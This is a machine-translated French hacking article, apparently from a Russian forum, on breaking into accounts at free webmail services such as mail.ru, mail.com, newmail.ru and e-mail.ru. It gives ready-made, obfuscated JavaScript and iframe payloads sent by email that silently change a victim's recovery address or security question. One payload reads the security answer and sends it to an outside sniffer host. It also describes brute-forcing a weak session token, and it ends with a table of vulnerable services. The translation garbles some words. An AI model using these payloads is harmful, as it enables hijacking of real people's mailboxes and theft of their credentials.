This page has been robot translated, sorry for typos if any. Original content here.

APERÇU DE LA VULNÉRABILITÉ DES SERVICES POSTAUX GRATUITS

Nous continuons à traiter avec le courrier électronique. J'ai mené une petite étude de divers services de piratage informatique et j'attire votre attention sur les résultats. La technologie d'attaque reste la même: un email avec un code JavaScript envoyé à l'adresse de quelqu'un d'autre est envoyé, ce qui fonctionne lorsque le message est ouvert et modifie certaines informations dans les paramètres de la boîte utilisateur. Il est inutile de décrire chaque serveur en détail, car l’approche est la même partout, alors je vais donner quelques exemples, et à la fin, un tableau. Dans la plupart des cas, le piratage peut être considéré à 100%, avec certaines hypothèses: l'utilisateur doit utiliser l'interface Web pour lire les lettres, lorsque l'écriture des exploits a été guidée par une plate-forme standard, navigateur avec exécution JS désactivé.

WWW.MAIL.RU

Je commencerai par le numéro de courrier 1 en Russie. À l'heure actuelle, en évitant le code JavaScript et une erreur du développeur, il est possible de casser cette case. Je crois que les principes de base sont bien connus. Comment obtenir un mot de passe? 1 - pour le changer sans autorisation. Ne passez pas, vous devez connaître le précédent. 2 - changer la question secrète et utiliser le service pour lutter contre l'amnésie. Aussi ne fonctionnera pas. 3 - configurez votre adresse e-mail secondaire pour obtenir le nouveau mot de passe généré par le système. Cela ne fonctionne pas, les deux dernières options listées ci-dessus sont sous la même forme et sont également protégées par mot de passe. Même le reste, représentant pour nous des paramètres moins intéressants (Nom, Prénom, etc.) maintenant sans entrer le mot de passe actuel ne pourra pas être modifié. Il semblerait qu'il n'y ait pas d'options. Cependant, il existe une section secondaire, discrète, des paramètres "Informations de contact" (ICQ, site Web, téléphone, lieu de travail, fuseau horaire, etc.). Dans cette section, vous pouvez également spécifier un e-mail de contact. L'astuce est qu'au même moment dans les informations d'enregistrement, l'adresse alternative change mais celle qui est enregistrée dans le questionnaire, et maintenant vous pouvez obtenir un mot de passe pour le savon en utilisant le service de rappel. C'est simple URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru vérité de la méthode GET est que les paramètres de la boîte mail.ru ne peuvent plus être modifiés. Je vais donc décrire en détail l'aspect technique de la question.

I. Nous envoyons à la boîte souhaitée une lettre avec un code qui générera un cadre directement dans le corps du message avec un lien vers notre site. Si possible, le script devrait fonctionner sans aucune saisie utilisateur (clic, clic, survol, transfert d’image, etc.):


 <embed src = "javascript: document.getElementById ('xxx'). innerHTML = '<iframe src = http: //votresite.votredomaine.com/votrescript.html> </ iframe>'; this.wav">
 <p id = 'xxx'>
Afin de garantir complètement la fonctionnalité du script, ainsi que le déguisement, nous convertissons:
 <embed src = "javascript: status = location; document.getElementById ('xxx'). innerHTML = 'iframe src = http: //votresite.com/votrescript.html width = 0 height = 0> </ iframe>' ; this.wav "width = 0 height = 0>
 <p id = 'xxx'>
Sous cette forme, les codes de caractères remplacent les lettres dans les noms des éléments javascript et iframe, et le script de messagerie ne les filtre pas. Le statut = ligne de localisation; Crée la visibilité de l'URL locale dans la barre d'état de sorte qu'aucun scintillement extérieur ne suscite la suspicion. Les attributs width et height du cadre et de l’incorporation sont définis sur zéro et les rendent invisibles.

II. Sur la ressource http://votresite.ru nous avons un document HTML avec un formulaire pour envoyer les données modifiées au serveur mail.ru.

Le contenu de yourscript.html:
 <form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br>
 <input type = "hidden" name = "page" value = "2"> <br>
 <input type = "hidden" name = "Email" value = "hacker@antichat.ru"> <br>
 <input type = "hidden" value = "Enregistrer" name = "Enregistrer"> <br>
 </ form> <br>
 <script> <br>
 document.anketa.submit (); <br>
 </ script>
Notes: le travail de la partie client du script sous une forme inchangée est garanti uniquement pour IE; La forme d'envoi est affichée sur un site distinct pour "décharger" la lettre.


WWW.MAIL.COM

Maintenant, une erreur de sécurité légèrement différente, par exemple http://mail.com. Si vous utilisez le service de rappel de mot de passe, pour l'obtenir, il vous suffit d'entrer la bonne réponse à la question secrète (une des options). Nous nous sommes donc donné la tâche d'obtenir cette réponse. Cela se fait facilement. Lorsque je suis entré dans les propriétés de la boîte aux lettres et que j'ai parcouru les informations d'enregistrement, j'ai constaté que la réponse à la question secrète n'était pas masquée, ce qui nous permet d'utiliser JavaScript pour interpréter sa valeur.

Nous implémentons le script via la balise de style .
Adresse de la page avec les paramètres: http://mail01.mail.com/scripts/common/genprofile.cgi
Nom du formulaire: profileform
Le nom du champ de texte avec une réponse secrète: hint_a
En fin de compte, pour voler une question secrète, vous devez appeler la page des paramètres, exécuter JavaScript, obtenir la valeur de document.profileform.hint_a.value et la transmettre au sniffer avec la variable d'environnement REQUEST_UR I.

Version prête à l'emploi:
 <style> @import url (javascript: document.getElementById ('out'). innerHTML = "<iframe src = http: //mail01.mail.com/scripts/common/genprofile.cgi name = 'zero'% 6FnLoad = `str = document.zero.profileform.hint_a.value; path = 'http: //zero.h12.ru/stat/capt.php?'; document.zero.location = chemin + str`> </ iframe>" ); </ style>
 <span id = 'out'> </ span>
Dans le cadre généré avec le nom zéro, la page des paramètres est chargée. À la fin du téléchargement, le gestionnaire OnLoad lance le script pour lire la question secrète, puis, à travers le même cadre, envoie une réponse au renifleur. Maintenant, il suffit d'aller sur http://zero.h12.ru/stat/log.php et de trouver les informations nécessaires dans la ligne "Host" .

WWW.NEWMAIL.RU

À mon avis, un facteur assez populaire, alors je vais vous en parler en détail. De plus, il est beaucoup plus facile de prendre possession du compte d'un autre que ce qu'il semble à première vue. Vous pouvez le faire: envoyer un message avec un script qui recevra l' identifiant de session au démarrage, générer les requêtes nécessaires et modifier les paramètres du courrier électronique altrénratif (auquel le mot de passe est envoyé ultérieurement) et la question et la réponse secrètes. Cependant, si vous spécifiez une autre adresse avec un rappel, le mot de passe lui sera envoyé, à condition que la réponse secrète soit correcte. Et l'observation suivante: l' identifiant de session pour modifier les paramètres ne peut pas être utilisé du tout. De plus, tous les tags sont autorisés. Tout ce qui précède réduit la quantité de code à deux lignes:
 <iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = QUESTION & cp_answ = ANSWER width = 0 height = 0> </ iframe> 

WWW.E-MAIL.RU

La méthode de piratage e-mail.ru n’entre pas dans le thème général de l’article, mais toujours :) . Lorsque j'ai eu besoin d'un mot de passe d'une boîte, j'ai enregistré mon compte comme d'habitude et j'ai commencé à enquêter sur le système. La première chose qui a attiré mon attention a été la possibilité de définir un nouveau mot de passe et une question secrète avec une réponse, sans entrer l'ancien mot de passe. Le plan d'action habituel consiste à vérifier le filtrage des balises, à obtenir l'ID et à exécuter la requête. Cependant, pour modifier les paramètres, utilisez une variable spéciale utoken, contenue dans le corps du document. Après avoir expérimenté le changement de la question et la réponse avec l'utoken précédemment connu:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ Je suis venu à la conclusion que l' identifiant et les cookies pour modifier les paramètres ne sont pas requis. Dans ce cas, après avoir surveillé l'utoken, il s'est avéré que le nombre hexadécimal à quatre chiffres après l'adresse e-mail email@e-mail.ru-5a00 se situe dans une plage très étroite. À savoir, pour établir une question secrète avec la réponse sur n'importe quelle boîte qui nous intéresse, vous devez passer par 7 options seulement: 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . Lorsque le nombre est deviné, nous entrerons dans la boîte souhaitée.

Notes: il y a eu quelques changements pour le moment. Le service de récupération de mot de passe ne fonctionne pas, il est donc conseillé de le modifier immédiatement. L'adresse du changement de configuration a également changé:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ La méthode ne fonctionne pas pour toujours. Probablement, tout de même, il est nécessaire que l'utilisateur entre de temps en temps dans le courrier via le Web .

Tableau avec caractéristiques des serveurs WWW gratuits

SERVEUR JavaScript VULNÉRABILITÉ
www.km.ru
km.ru
img src = javascript: Vous permet de lire le mot de passe à partir de la page des paramètres à partir du champ mot de passe
www.mail.ru
inbox.ru , bk.ru , list.ru ,
incorporer src = javascript: Vous pouvez changer un autre email
www.mail.com
email.com , post.com , myself.com , consultant.com et autres.
@ import url (javascript :); Les paramètres affichent la réponse à la question de sécurité
www.newmail.ru
nm.ru , hotmail.ru , orc.ru , nightmail.ru
De toute façon Lisez / modifiez la question et la réponse. Le mot de passe est valide
www.netman.ru et www.mailgate.ru
le même facteur. environ 80 domaines
img src = javascript :, style = background: url (javascript :) Vous pouvez voler une réponse à une question secrète, si elle est installée. Il est également possible de définir l'adresse pour le transfert (les copies ne sont pas enregistrées)
www.yandex.ru OnError, OnLoad Suppression du site * .narod.ru (JS n'est pas requis)
www.ukr.net intégrer src = javasc
ript: this .wav>
Lisez la réponse à votre question de sécurité
www.nextmail.ru
xaker.ru , email.su , russian.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
embed src = "javascript: Changer / voler la réponse à votre question de sécurité
www.hotbox.ru
pochta.ru , pisem.net , fromru.com , land.ru et autres.
À bien des égards Supprimer un compte
www.rin.ru incorporer src = javascript: Lire la réponse secrète